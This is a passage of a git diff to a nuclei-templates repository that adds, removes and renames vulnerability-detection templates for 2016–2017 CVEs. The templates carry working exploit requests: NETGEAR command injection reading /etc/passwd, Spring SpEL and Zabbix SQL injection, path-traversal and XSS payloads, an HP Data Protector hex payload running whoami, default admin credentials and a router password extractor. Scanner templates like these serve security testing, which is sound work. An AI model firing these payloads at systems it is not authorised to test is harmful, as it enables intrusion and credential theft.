- description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."
- remediation: |
- Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability.
- reference:
- - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability
- - https://nvd.nist.gov/vuln/detail/CVE-2016-3978
- - http://seclists.org/fulldisclosure/2016/Mar/68
- - http://www.securitytracker.com/id/1035332
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2016-3978
- cwe-id: CWE-79
- epss-score: 0.00217
- epss-percentile: 0.59635
- cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:*
- metadata:
- max-request: 1
- vendor: fortinet
- product: fortios
- tags: cve2016,redirect,fortinet,fortios,seclists,cve
-
-http:
- - method: GET
- path:
- - '{{BaseURL}}/login?redir=http://www.interact.sh'
-
- matchers:
- - type: regex
- part: header
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-
-# digest: 490a0046304402207e761f1578b7a14eb6f42b8763e5c4bd9e36d282329f0fd7076f2b8af27e26610220203cb7abb1f00d4c45dbb3d848846f7d0378583b4fc917a250fb600b48fb8df3:922c64590222798bb761d5b6d8e72950
diff --git a/nuclei-templates/CVE-2016/CVE-2016-4975.yaml b/nuclei-templates/CVE-2016/CVE-2016-4975.yaml
deleted file mode 100644
index ad77d61eda..0000000000
--- a/nuclei-templates/CVE-2016/CVE-2016-4975.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2016-4975
-
-info:
- name: Apache mod_userdir CRLF injection
- author: melbadry9,nadino,xElkomy
- severity: medium
- description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
- reference:
- - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
- - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
- remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2016-4975
- cwe-id: CWE-93
- tags: cve,cve2016,crlf,generic,apache
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
- matchers:
- - type: regex
- part: header
- regex:
- - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
-
-# Enhanced by cs on 2022/02/14
diff --git a/nuclei-templates/CVE-2016/CVE-2016-4977.yaml b/nuclei-templates/CVE-2016/CVE-2016-4977.yaml
new file mode 100644
index 0000000000..14915babc9
--- /dev/null
+++ b/nuclei-templates/CVE-2016/CVE-2016-4977.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-4977
+
+info:
+ name: Spring Security OAuth2 Remote Command Execution
+ author: princechaddha
+ severity: high
+ description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.
+ reference:
+ - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
+ - https://tanzu.vmware.com/security/cve-2016-4977
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-4977
+ - https://pivotal.io/security/cve-2016-4977
+ remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2016-4977
+ cwe-id: CWE-19
+ tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring
+ metadata:
+ max-request: 1
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Unsupported response types: [978015547]"
+
+ - type: status
+ status:
+ - 400
+
+# Enhanced by mp on 2022/04/04
diff --git a/nuclei-templates/CVE-2016/CVE-2016-5649.yaml b/nuclei-templates/CVE-2016/CVE-2016-5649.yaml
new file mode 100644
index 0000000000..df16e9116c
--- /dev/null
+++ b/nuclei-templates/CVE-2016/CVE-2016-5649.yaml
@@ -0,0 +1,47 @@
+id: CVE-2016-5649
+
+info:
+ name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
+ author: suman_kar
+ severity: critical
+ description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-5649
+ - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
+ - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2016-5649
+ cwe-id: CWE-200
+ tags: cve,cve2016,iot,netgear,router,packetstorm
+ metadata:
+ max-request: 1
+
+http:
+ - raw:
+ - |
+ GET /BSW_cxttongr.htm HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Smart Wizard Result "
+ part: body
+
+ extractors:
+ - type: regex
+ name: password
+ part: body
+ group: 1
+ regex:
+ - 'Success "([a-z]+)"'
+
+# Enhanced by mp on 2022/05/10
diff --git a/nuclei-templates/CVE-2016/CVE-2016-6277.yaml b/nuclei-templates/CVE-2016/CVE-2016-6277.yaml
new file mode 100644
index 0000000000..c957708dad
--- /dev/null
+++ b/nuclei-templates/CVE-2016/CVE-2016-6277.yaml
@@ -0,0 +1,38 @@
+id: CVE-2016-6277
+
+info:
+ name: NETGEAR Routers - Remote Code Execution
+ author: pikpikcu
+ severity: high
+ description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
+ reference:
+ - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
+ - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
+ - https://www.kb.cert.org/vuls/id/582384
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2016-6277
+ cwe-id: CWE-352
+ tags: cve,cve2016,netgear,rce,iot,kev
+ metadata:
+ max-request: 1
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/nuclei-templates/CVE-2016/CVE-2016-7552.yaml b/nuclei-templates/CVE-2016/CVE-2016-7552.yaml
new file mode 100644
index 0000000000..e8000d4ef0
--- /dev/null
+++ b/nuclei-templates/CVE-2016/CVE-2016-7552.yaml
@@ -0,0 +1,36 @@
+id: CVE-2016-7552
+
+info:
+ name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
+ author: dwisiswant0
+ severity: critical
+ description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
+ reference:
+ - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-7552
+ - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6
+ - http://www.securityfocus.com/bid/97599
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2016-7552
+ cwe-id: CWE-22
+ tags: cve,cve2016,lfi,auth,bypass
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/logoff.cgi"
+ headers:
+ Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Memory map"
+ part: body
+
+# Enhanced by mp on 2022/05/10
diff --git a/nuclei-templates/CVE-2016/cve-2016-7981.yaml b/nuclei-templates/CVE-2016/CVE-2016-7981.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-7981.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-7981.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-0957.yaml b/nuclei-templates/CVE-2016/cve-2016-0957.yaml
new file mode 100644
index 0000000000..55a0fb1e4e
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-0957.yaml
@@ -0,0 +1,32 @@
+id: CVE-2016-0957
+
+info:
+ name: Adobe AEM Console Disclosure
+ author: geeknik
+ description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
+ reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
+ severity: high
+ tags: cve,cve2016,adobe,aem
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2016-0957
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/system/console?.css"
+ headers:
+ Authorization: "Basic YWRtaW46YWRtaW4K"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Adobe"
+ - "java.lang"
+ - "(Runtime)"
+ condition: and
diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml b/nuclei-templates/CVE-2016/cve-2016-1000126.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/CVE-2016-1000126.yaml
rename to nuclei-templates/CVE-2016/cve-2016-1000126.yaml
diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml b/nuclei-templates/CVE-2016/cve-2016-1000128.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/CVE-2016-1000128.yaml
rename to nuclei-templates/CVE-2016/cve-2016-1000128.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000129.yaml b/nuclei-templates/CVE-2016/cve-2016-1000129.yaml
new file mode 100644
index 0000000000..fbeb35821b
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-1000129.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000129
+
+info:
+ name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000129
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml b/nuclei-templates/CVE-2016/cve-2016-1000148.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/CVE-2016-1000148.yaml
rename to nuclei-templates/CVE-2016/cve-2016-1000148.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-10134.yaml b/nuclei-templates/CVE-2016/cve-2016-10134.yaml
new file mode 100644
index 0000000000..0beac218e5
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-10134.yaml
@@ -0,0 +1,34 @@
+id: CVE-2016-10134
+
+info:
+ name: SQL injection vulnerability in zabbix "latest.php"
+ author: princechaddha
+ severity: critical
+ description: SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
+ tags: cve,cve2016,zabbix,sqli
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2016-10134
+ cwe-id: CWE-89
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Error in query [INSERT INTO profiles (profileid, userid'
+ - 'You have an error in your SQL syntax'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-10956.yaml b/nuclei-templates/CVE-2016/cve-2016-10956.yaml
deleted file mode 100644
index 0d3a7bd668..0000000000
--- a/nuclei-templates/CVE-2016/cve-2016-10956.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-10956
-
-info:
- name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
- author: daffainfo,0x240x23elu
- severity: high
- description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
- reference:
- - https://cxsecurity.com/issue/WLB-2016080220
- - https://wpvulndb.com/vulnerabilities/8609
- tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2016-10956
- cwe-id: CWE-20
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-2004.yaml b/nuclei-templates/CVE-2016/cve-2016-2004.yaml
new file mode 100644
index 0000000000..36d3104dc0
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-2004.yaml
@@ -0,0 +1,31 @@
+id: CVE-2016-2004
+
+info:
+ name: HP Data Protector A.09.00 - Arbitrary Command Execution
+ author: pussycat0x
+ severity: critical
+ tags: cve,cve2016,network,iot,hp,rce
+ description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
+ reference:
+ - https://www.exploit-db.com/exploits/39858
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2016-2004
+ cwe-id: CWE-306
+
+network:
+ - inputs:
+ - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
+ type: hex
+
+ host:
+ - "{{Hostname}}"
+ - "{{Host}}:5555"
+
+ matchers:
+ - type: word
+ encoding: hex
+ words:
+ - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
diff --git a/nuclei-templates/CVE-2016/cve-2016-2389.yaml b/nuclei-templates/CVE-2016/cve-2016-2389.yaml
deleted file mode 100644
index 364e21e9ba..0000000000
--- a/nuclei-templates/CVE-2016/cve-2016-2389.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-2389
-
-info:
- name: SAP xMII 15.0 - Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
- reference:
- - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- - https://www.cvedetails.com/cve/CVE-2016-2389
- tags: cve,cve2016,lfi,sap
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2016-2389
- cwe-id: CWE-22
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-3978.yaml b/nuclei-templates/CVE-2016/cve-2016-3978.yaml
new file mode 100644
index 0000000000..ac3ab10ad8
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-3978.yaml
@@ -0,0 +1,27 @@
+id: CVE-2016-3978
+
+info:
+ name: FortiOS (Fortinet) - Open Redirect and XSS
+ author: 0x_Akoko
+ severity: medium
+ description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
+ reference:
+ - https://seclists.org/fulldisclosure/2016/Mar/68
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-3978
+ tags: cve,cve2016,redirect,fortinet,fortios
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-3978
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login?redir=http://www.example.com'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/nuclei-templates/CVE-2016/cve-2016-4975.yaml b/nuclei-templates/CVE-2016/cve-2016-4975.yaml
new file mode 100644
index 0000000000..f94762b21e
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-4975.yaml
@@ -0,0 +1,24 @@
+id: CVE-2016-4975
+
+info:
+ name: Apache mod_userdir CRLF injection
+ author: melbadry9,nadino,xElkomy,sullo
+ severity: low
+ description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
+ tags: crlf,generic,cves,cve2016,apache
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-4975
+ cwe-id: CWE-93
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
+ part: header
diff --git a/nuclei-templates/CVE-2016/cve-2016-4977.yaml b/nuclei-templates/CVE-2016/cve-2016-4977.yaml
deleted file mode 100644
index af1c7246b2..0000000000
--- a/nuclei-templates/CVE-2016/cve-2016-4977.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-4977
-
-info:
- name: Spring Security OAuth2 Remote Command Execution
- author: princechaddha
- severity: high
- description: When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.
- reference:
- - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- - https://nvd.nist.gov/vuln/detail/CVE-2016-4977
- tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.80
- cve-id: CVE-2016-4977
- cwe-id: CWE-19
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "Unsupported response types: [978015547]"
-
- - type: status
- status:
- - 400
diff --git a/nuclei-templates/CVE-2016/cve-2016-5649.yaml b/nuclei-templates/CVE-2016/cve-2016-5649.yaml
deleted file mode 100644
index 40868caf7e..0000000000
--- a/nuclei-templates/CVE-2016/cve-2016-5649.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2016-5649
-
-info:
- name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
- author: suman_kar
- severity: critical
- description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
- tags: cve,cve2016,iot,netgear,router
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2016-5649
- cwe-id: CWE-200
-
-requests:
- - raw:
- - |
- GET /BSW_cxttongr.htm HTTP/1.1
- Host: {{Hostname}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "Smart Wizard Result "
- part: body
-
- extractors:
- - type: regex
- name: password
- part: body
- group: 1
- regex:
- - 'Success "([a-z]+)"'
diff --git a/nuclei-templates/CVE-2016/cve-2016-6277.yaml b/nuclei-templates/CVE-2016/cve-2016-6277.yaml
deleted file mode 100644
index fd2ae09625..0000000000
--- a/nuclei-templates/CVE-2016/cve-2016-6277.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-6277
-
-info:
- name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
- author: pikpikcu
- severity: high
- description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
- tags: cve,cve2016,netgear,rce,iot
- reference:
- - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
- - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- cvss-score: 8.80
- cve-id: CVE-2016-6277
- cwe-id: CWE-352
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-7552.yaml b/nuclei-templates/CVE-2016/cve-2016-7552.yaml
deleted file mode 100644
index d5cbdd06b5..0000000000
--- a/nuclei-templates/CVE-2016/cve-2016-7552.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-7552
-
-info:
- name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
- author: dwisiswant0
- severity: critical
- description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
- reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
- tags: cve,cve2016,lfi,auth,bypass
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2016-7552
- cwe-id: CWE-22
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cgi-bin/logoff.cgi"
- headers:
- Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "Memory map"
- part: body
diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml
deleted file mode 100644
index cff57e655a..0000000000
--- a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml
+++ /dev/null
@@ -1,44 +0,0 @@
-id: CVE-2017-1000029
-
-info:
- name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
- author: 0x_Akoko
- severity: high
- description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
- impact: |
- Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
- remediation: |
- Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
- reference:
- - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
- - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
- - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2017-1000029
- cwe-id: CWE-200
- epss-score: 0.00387
- epss-percentile: 0.70348
- cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
- metadata:
- max-request: 1
- vendor: oracle
- product: glassfish_server
- tags: cve,cve2017,glassfish,oracle,lfi
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/resource/file%3a///etc/passwd/"
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0:"
-
- - type: status
- status:
- - 200
-# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2017/CVE-2017-11586.yaml b/nuclei-templates/CVE-2017/CVE-2017-11586.yaml
deleted file mode 100644
index 5816b710d3..0000000000
--- a/nuclei-templates/CVE-2017/CVE-2017-11586.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2017-11586
-info:
- name: dayrui FineCms 5.0.9 - Open redirect
- author: 0x_Akoko
- severity: low
- description: dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
- reference:
- - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
- - https://www.cvedetails.com/cve/CVE-2017-11586
- - https://vuldb.com/?id.104434
- tags: cve,cve2017,redirect,opentext
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2017-11586
- cwe-id: CWE-601
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/index.php?c=weixin&m=sync&url=http://example.com'
- matchers:
- - type: regex
- regex:
